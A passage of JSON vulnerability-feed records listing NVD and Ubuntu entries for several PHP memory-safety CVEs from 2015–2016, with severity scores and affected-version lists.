"cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6835", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:33", "description": "Multiple use-after-free vulnerabilities in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 allow remote attackers to execute arbitrary code via vectors related to (1) the Serializable interface, (2) the SplObjectStorage class, and (3) the SplDoublyLinkedList class, which are mishandled during unserialization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6834", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6834", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6834", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:36", "description": "The SoapClient __call method in ext/soap/soap.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 does not properly manage headers, which allows remote attackers to execute arbitrary code via crafted serialized data that triggers a \"type confusion\" in the serialize_function_call function.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 
"LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-01-19T05:59:00", "type": "cve", "title": "CVE-2015-6836", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6836", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6836", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T16:45:00", "description": "The unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-6834.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-04T20:59:00", "type": "cve", "title": "CVE-2016-9936", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2016-9936"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.12", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.0.10"], "id": "CVE-2016-9936", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9936", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-08-04T14:15:22", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before\n5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before\n2.9.2 is used, does not consider the possibility of a NULL valuePop return\nvalue before proceeding with a free operation during initial error\nchecking, which allows remote attackers to cause a denial of service (NULL\npointer dereference and application crash) via a crafted XML document, a\ndifferent vulnerability than CVE-2015-6838.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=69782>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | DoS only?\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6837", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6837", "href": "https://ubuntu.com/security/CVE-2015-6837", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:15:22", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before\n5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before\n2.9.2 is used, does not consider the possibility of a NULL valuePop return\nvalue before proceeding with a free operation after the principal argument\nloop, which allows remote attackers to cause a denial of service (NULL\npointer dereference and application crash) via a crafted XML document, a\ndifferent vulnerability than CVE-2015-6837.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=69782>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | DoS only? \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | same commit as CVE-2015-6837\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6838", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6838", "href": "https://ubuntu.com/security/CVE-2015-6838", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:15:22", "description": "The session deserializer in PHP before 5.4.45, 5.5.x before 5.5.29, and\n5.6.x before 5.6.13 mishandles multiple php_var_unserialize calls, which\nallow remote attackers to execute arbitrary code or cause a denial of\nservice (use-after-free) via crafted session content.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=70219>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6835", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6835"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6835", "href": "https://ubuntu.com/security/CVE-2015-6835", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:15:22", "description": "Multiple use-after-free vulnerabilities in PHP before 5.4.45, 
5.5.x before\n5.5.29, and 5.6.x before 5.6.13 allow remote attackers to execute arbitrary\ncode via vectors related to (1) the Serializable interface, (2) the\nSplObjectStorage class, and (3) the SplDoublyLinkedList class, which are\nmishandled during unserialization.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=70172>\n * <https://bugs.php.net/bug.php?id=70365>\n * <https://bugs.php.net/bug.php?id=70366>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6834", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6834", "href": "https://ubuntu.com/security/CVE-2015-6834", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:15:23", "description": "The SoapClient __call method in ext/soap/soap.c in PHP before 5.4.45, 5.5.x\nbefore 5.5.29, and 5.6.x before 5.6.13 does not properly manage headers,\nwhich allows remote attackers to execute arbitrary code via crafted\nserialized data that triggers a \"type confusion\" in the\nserialize_function_call 
